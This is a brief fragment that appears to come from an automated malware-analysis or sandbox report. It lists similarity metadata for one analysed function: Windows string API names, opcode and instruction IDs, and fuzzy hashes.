                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                      • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9